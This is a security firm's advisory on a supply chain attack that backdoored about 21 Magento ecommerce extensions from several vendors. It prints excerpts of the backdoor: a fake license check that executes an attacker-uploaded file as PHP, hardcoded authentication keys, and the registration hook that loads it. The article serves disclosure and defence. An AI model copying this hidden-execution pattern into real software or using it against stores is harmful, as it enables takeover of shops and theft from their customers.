Backdoor found in popular ecommerce components
by Sansec Forensics Team
Published in Threat Research − May 01, 2025
Multiple vendors were hacked in a coordinated supply chain attack, Sansec found 21 applications with the same backdoor. Curiously, the malware was injected 6 years ago, but came to life this week as attackers took full control of ecommerce servers. Sansec estimates that between 500 and 1000 stores are running backdoored software.
Hundreds of stores, including a $40 billion multinational, are running backdoored versions of popular ecommerce software. We found that the backdoor is actively used since at least April 20th. Sansec identified these backdoors in the following packages which were published between 2019 and 2022.
| Vendor | Package |
|---|---|
| Tigren | Ajaxsuite |
| Tigren | Ajaxcart |
| Tigren | Ajaxlogin |
| Tigren | Ajaxcompare |
| Tigren | Ajaxwishlist |
| Tigren | MultiCOD |
| Meetanshi | ImageClean |
| Meetanshi | CookieNotice |
| Meetanshi | Flatshipping |
| Meetanshi | FacebookChat |
| Meetanshi | CurrencySwitcher |
| Meetanshi | DeferJS |
| MGS | Lookbook |
| MGS | StoreLocator |
| MGS | Brand |
| MGS | GDPR |
| MGS | Portfolio |
| MGS | Popup |
| MGS | DeliveryTime |
| MGS | ProductTabs |
| MGS | Blog |
We established that Tigren, Magesolution (MGS) and Meetanshi servers have been breached and that attackers were able to inject backdoors on their download servers.
This hack is called a Supply Chain Attack, which is one of the worst types. By hacking these vendors, the attacker gained access to all of their customers' stores. And by proxy, to all of the customers that visit these stores.
We also found a backdoored version of the Weltpixel GoogleTagManager extension, but we have not been able to establish whether Weltpixel or these particular stores got compromised.
Check your store now
If you use software from these vendors, you should check your store now. The backdoor consists of a fake license check in a file called License.php or LicenseApi.php.
The evil is in the adminLoadLicense function, which executes $licenseFile as PHP.
protected function adminLoadLicense($licenseFile)
{
// ...
$data = include_once($licenseFile);
// ...
}
The $licenseFile can be controlled by the attacker using the adminUploadLicense function. In versions from 2019 this does not require any authentication. In later versions this requires a secret key that must match the hardcoded checksum and salt:
class License {
const SECURE_KEY = '83ba291cd9201e9a28173741bac82745';
const SIGN_KEY = 'afa3a778bd34181c44f2dfe1de8aff05';
The fake license check is explicitly activated via registration.php.
<?php
\Magento\Framework\Component\ComponentRegistrar::register(
\Magento\Framework\Component\ComponentRegistrar::MODULE,
'Meetanshi_CookieNotice',
__DIR__
);
if (file_exists(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php')) {
include_once(__DIR__ . DIRECTORY_SEPARATOR . 'Model/System/Config/Source/Box/License/License.php');
}
The backdoor code is the same for all found packages, except for:
- The authorization checksum (unique per vendor)
- The backdoor path (unique per module)
- The license filename (unique per vendor)
| Vendor | Meetanshi | MGS | Tigren | Weltpixel |
|---|---|---|---|---|
| Secure Key | 05aafe4... | 83ba291... | e7c057dd... | 47946a7... |
| Sign Key | f31d647... | afa3a77... | 313bedf... | 52dd8df... |
| License Filename | mtn-license | mgs-license | apj-license | wlp-license |
Recommendations
Sansec’s eComscan detects this malware out of the box. If you find a backdoor on your store, you can safely remove the fake License file. If you still have the original source in a zip file (particularly WeltPixel), please share it with us for further analysis.
At this point, we recommend to be extremely cautious when using software from these vendors.
Vendor responses
Magesolution (MGS) did not respond, but the backdoored packages can still be downloaded from their site as of Apr 30th.
Tigren denies to have been hacked, but the backdoored packages are still available on their site as of Apr 30th.
Meetanshi claims that their software has not been tampered with, but confirmed that their server got hacked.
Further research
It is rare that a backdoor remains undetected for 6 years, but is even stranger that actual abuse has only started now.
We will update this post when we learn more.
Need help or want a second opinion? Get in touch.
Credits
Special thanks to Alexandra Zota for discovering the initial abuse.
Read more
In this article
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
